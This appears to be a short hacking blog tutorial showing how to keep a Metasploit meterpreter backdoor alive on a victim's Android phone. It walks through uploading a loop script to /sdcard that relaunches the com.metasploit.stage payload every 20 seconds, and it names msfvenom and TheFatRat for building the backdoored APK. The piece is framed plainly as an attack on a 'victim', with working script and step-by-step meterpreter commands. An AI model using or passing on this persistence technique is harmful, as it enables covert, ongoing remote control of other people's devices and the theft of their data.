Backdoor In Android Using Kali Linux With A Shell Script

 we’re going to show you how hackers can create a persistent backdoor in android using Kali Linux after hacking with msfvenom.

You can use any of the methods above to hack the android device but once you get the meterpreter session, that session is not persistent, to make it persistent, you need to upload one shell script into any location of /sdcard directory.

Generally, your victim’s device is not rooted, so you can’t create any file in /etc/init.d directory due to fewer permissions, so we are using another method to upload a backdoor in /sdcard directory using shell command and then will execute the script which automatically makes a persistent backdoor in that android device.

First required part is to get the meterpreter session by using any of the methods, there are a lot of methods to build a backdoor .apk file like using TheFatRat, msfvenom and spade etc. You can use any of the methods and get the meterpreter session.

As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:

#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

And save it as anyname.sh

here’s the updated version of above shell script which is 100% compatible with all android versions:

#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

After that, you need to get into the root directory of the android device by typing “cd /” in the terminal.

Now you need to get into /sdcard location by typing “cd /sdcard” in the same terminal.

Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in the same terminal.

Now, all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.

Here you need to again go into the same location i.e. cd /root/sdcard and execute the backdoor using “sh yeahhub-backdoor.sh“.

your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.

You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in the above screen.

The persistent of the backdoor will only remain until a reboot of the android system. If your victim is in the same network i.e. LAN, then the persistence will remain forever on LAN and if you have static IP, then also your persistence will remain forever on WAN too.